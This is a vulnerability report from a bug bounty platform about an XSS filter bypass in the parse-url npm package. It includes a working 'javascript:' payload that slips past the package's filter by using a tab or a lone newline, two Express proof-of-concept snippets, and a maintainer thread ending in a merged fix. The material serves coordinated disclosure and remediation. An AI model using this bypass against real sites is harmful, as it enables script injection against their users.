https://huntr.dev/bounties/582cb14b-b2a8-4064-91c5-b580ff69ba07/ fix bypass; XSS via improper input validation of \t and lone \n character in ionicabizau/parse-url

Valid

Reported on

Jun 7th 2022


Description

I read this report https://huntr.dev/bounties/582cb14b-b2a8-4064-91c5-b580ff69ba07/ and noticed \t and lone \n is also missing from the filter list in the regex URL

replace(/\r?\n|\r/gm, "")

All instances of \r \n and \t should be cleaned, but the filter list only checks for \r\n or \r. Therefore, someone can still specify a single \n or single \t which will not be checked and bypass the filter.

Proof of Concept

const parseUrl = require("parse-url"); 
const express = require('express');
const app = express();

parsed = parseUrl("jav\tascript://%0aalert(1)");
console.log(parsed);

app.get('/', (req, res) => {
    if (parsed.protocol !== "javascript") {
        res.send("<a href=\'" + parsed.href + "\'>CLICK ME!</a>")
    }
})

app.listen(9999);
const parseUrl = require("parse-url"); 
const express = require('express');
const app = express();

parsed = parseUrl("jav\nascript://%0aalert(1)");
console.log(parsed);

app.get('/', (req, res) => {
    if (parsed.protocol !== "javascript") {
        res.send("<a href=\'" + parsed.href + "\'>CLICK ME!</a>")
    }
})

app.listen(9999);

Impact

XSS

We are processing your report and will contact the ionicabizau/parse-url team within 24 hours. 2 months ago
haxatron modified the report
2 months ago
haxatron modified the report
2 months ago
haxatron modified the report
2 months ago
We have contacted a member of the ionicabizau/parse-url team and are waiting to hear back 2 months ago
haxatron modified the report
2 months ago
haxatron modified the report
2 months ago
We have sent a follow up to the ionicabizau/parse-url team. We will try again in 7 days. 2 months ago
We have sent a second follow up to the ionicabizau/parse-url team. We will try again in 10 days. 2 months ago
Ionică
a month ago

Maintainer


Hi there! Sorry for the late reply and thank you for this report. I am working on fixing this.

haxatron
a month ago

Researcher


Hi @maintainer, can be fixed using the following regex:

url = (url || "").trim().replace(/\r|\n|\t/gm, "");

It deletes all \r, \n and \t in the URL.

Ionică Bizău (Johnny B.) validated this vulnerability a month ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Ionică Bizău (Johnny B.) confirmed that a fix has been merged on 21c72a a month ago
Ionică Bizău (Johnny B.) has been awarded the fix bounty
to join this conversation